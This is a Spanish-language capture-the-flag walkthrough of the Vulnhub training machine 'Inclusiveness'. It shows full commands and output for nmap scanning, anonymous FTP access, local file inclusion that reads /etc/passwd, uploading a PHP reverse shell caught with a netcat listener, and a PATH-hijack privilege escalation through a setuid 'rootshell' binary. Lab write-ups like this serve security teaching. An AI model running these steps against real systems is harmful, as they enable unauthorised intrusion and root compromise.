[VLN] Inclusiveness

Hoy vamos a hackear la maquina de Vulnhub llamada Inclusiveness. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/inclusiveness-1,422/
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.96 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-30 11:27 CEST Nmap scan report for inclusiveness.home (192.168.1.96) Host is up (0.00036s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxrwxrwx 2 0 0 4096 Feb 08 21:51 pub [NSE: writeable] | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.1.148 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) | ssh-hostkey: | 2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA) | 256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA) |_ 256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Apache2 Debian Default Page: It works Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.96 seconds
    Podemos ver que podemos loguear con anonymous en el FTP y que solo hay una carpeta llamada "pub".
    sml@Cassandra:~$ ftp 192.168.1.96 Connected to 192.168.1.96. 220 (vsFTPd 3.0.3) Name (192.168.1.96:sml): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 2 0 0 4096 Feb 08 21:51 pub 226 Directory send OK. ftp> cd pub 250 Directory successfully changed. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp>
    Apache solo muestra la web "por defecto". Al intentar mirar el /robots.txt nos aparece el siguiente mensaje: You are not a search engine! You can't read my robots.txt! Usamos curl para falsear el user-agent y que piense que somos un buscador:
    sml@Cassandra:~$ curl --user-agent "Googlebot/2.1 (+http://www.google.com/bot.html)" -v $@ http://192.168.1.96/robots.txt * Trying 192.168.1.96:80... * TCP_NODELAY set * Connected to 192.168.1.96 (192.168.1.96) port 80 (#0) > GET /robots.txt HTTP/1.1 > Host: 192.168.1.96 > User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html) > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Mon, 30 Mar 2020 09:27:26 GMT < Server: Apache/2.4.38 (Debian) < Last-Modified: Sat, 08 Feb 2020 03:26:11 GMT < ETag: "2d-59e08115bb1ef" < Accept-Ranges: bytes < Content-Length: 45 < Content-Type: text/plain < User-agent: * Disallow: /secret_information/ * Connection #0 to host 192.168.1.96 left intact
    Nos devuelve: Disallow: /secret_information/ En http://192.168.1.96/secret_information/ aparece una web con un texto y 2 links, al hacer clic en cualquiera de ellos al final de la url se agrega: ?lang=en o ?lang=es, asi que probamos si ?lang= es vulnerable a LFI. Podemos usar fi-cyberspace-scan[1].
    sml@Cassandra:~/tools/fi-cyberspace-scan$ python fi-cyberscan.py -t http://192.168.1.96/secret_information/?lang= -m 3 ----------------------------------------------------------------- '___ * . ' \|/ * . ' + .----. . ' -*- |===| ' __ -*- FI Cyberspace-Scan ||'''|_ ' ___ |= =|__' _|==|_ /|\ ___ * . __ _||= =|.| * __|===| |= =|::| |.|:|==|____|= =| . ____|==| |::|= =|.|__ '|::|= =| |=|=|::|_|.|:|==| :: |_.-`-.__|----|==|_|::|=|=|.|::|_|::|= =| -----------------------Hardwired Options------------------------- TARGET URL : http://192.168.1.96/secret_information/?lang= CYBER ATTACK MODE : Kuang-Grade-Mark-11 PATH TYPE : ../ DEEP SPACE TRAVERSAL : False NULL-BYTE %00 : False ----------------------------------------------------------------- DO NOT USE AGAINST UNAUTHORIZED INTRUSION COUNTERMEASURE ELECTRONICS Execute Cyberspace Run? [Y/n]: ----------------------------------------------------------------- It seems 146 is the common reflected byte size. Digging into unique reflection sizes. ----------------------------------------------------------------- [+] - Something interesting found with proc/self/cmdline in --Path: / --Path: ../../../../ [+] - Something interesting found with proc/self/stat in --Path: / --Path: ../../../../ [+] - Something interesting found with etc/issue in --Path: / --Path: ../../../../ [+] - Something interesting found with etc/motd in --Path: / --Path: ../../../../ [+] - Something interesting found with etc/passwd in --Path: / --Path: ../../../../ [+] - Something interesting found with etc/group in --Path: / --Path: ../../../../ [+] - Something interesting found with etc/mysql/my.cnf in --Path: / --Path: ../../../../ [+] - Something interesting found with etc/vsftpd.conf in --Path: / --Path: ../../../../ [+] - Something interesting found with etc/fstab in --Path: / --Path: ../../../../ [+] - Something interesting found with proc/self/cmdline in --Path: / --Path: ../../../../ [+] - Something interesting found with proc/self/stat in --Path: / --Path: ../../../../ [+] - Something interesting found with proc/self/status in --Path: / --Path: ../../../../ ----------------------------------------------------------------- Cyber Run Status: COMPLETE -----------------------------------------------------------------
    Es vulnerable a LFI y podemos ver el contenido de varios ficheros. Si miramos el contenido del fichero /etc/vsftpd.conf: http://192.168.1.96/secret_information/?lang=etc/vsftpd.conf Podemos ver que tiene la linea: anon_root=/var/ftp/ Eso quiere decir que cuando subimos algo al FTP como usuario anonymous (el cual tiene la carpeta pub), realmente lo estamos poniendo en /var/ftp/pub, sabiendo esto podemos subir el tipico php-reverse-shell y usar LFI para ejecutarlo.
  • Exploitation
  • sml@Cassandra:/usr/share/webshells/php$ cp php-reverse-shell.php /home/sml/webshell.php sml@Cassandra:~$ nano webshell.php #Modificamos la ip y puerto. sml@Cassandra:~$ ftp 192.168.1.96 Connected to 192.168.1.96. 220 (vsFTPd 3.0.3) Name (192.168.1.96:sml): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd pub 250 Directory successfully changed. ftp> put webshell.php local: webshell.php remote: webshell.php 200 PORT command successful. Consider using PASV. 150 Ok to send data. 226 Transfer complete. 5495 bytes sent in 0.00 secs (201.5554 MB/s) ftp>
    Ahora que hemos subido php-reverse-shell.php ejecutamos en un terminal:
    nc -nlvp 5555
    Y visitamos http://192.168.1.96/secret_information/?lang=/var/ftp/pub/webshell.php Ya tenemos una shell :)
    sml@Cassandra:~$ nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.96] 43170 Linux inclusiveness 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux 20:16:40 up 52 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $
  • Privilege Escalation
  • En /home/tom podemos ver un ejecutable llamado rootshell con setuid y propietario/grupo root, el cual si pudieramos ejecutar obtendriamos los privilegios de root. Podemos ver el codigo que se encuentra en rootshell.c
    #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> int main() { printf("checking if you are tom...\n"); FILE* f = popen("whoami", "r"); char user[80]; fgets(user, 80, f); printf("you are: %s\n", user); //printf("your euid is: %i\n", geteuid()); if (strncmp(user, "tom", 3) == 0) { printf("access granted.\n"); setuid(geteuid()); execlp("sh", "sh", (char *) 0); } }
    Basicamente lo que hace es "ejecuta" whoami, y comprueba si la salida es "tom", si es "tom", obtendremos privilegios de root. Para ello, vemos que no ha puesto el path absoluto a whoami, lo cual nos permite poder modificar la variable $PATH y crear un script llamado whoami que al ejecutarlo de como salida "tom", asi al ejecutar el programa nos dara una shell de root.
    $ cd /tmp $ echo "echo tom" > whoami $ chmod +x whoami $ echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin $ export PATH=/tmp:$PATH $ echo $PATH /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin $ cd /home/tom $ ./rootshell checking if you are tom... you are: tom access granted. # id uid=0(root) gid=33(www-data) groups=33(www-data) # cd /root # ls flag.txt # cat flag.txt |\---------------\ || | || UQ Cyber Squad | || | |\~~~~~~~~~~~~~~~\ | | | | o flag{omg_you_did_it_YAY} #
  • End
  • Y con esto ya seriamos root de la maquina :) [1]https://github.com/rtcrowley/fi-cyberspace-scan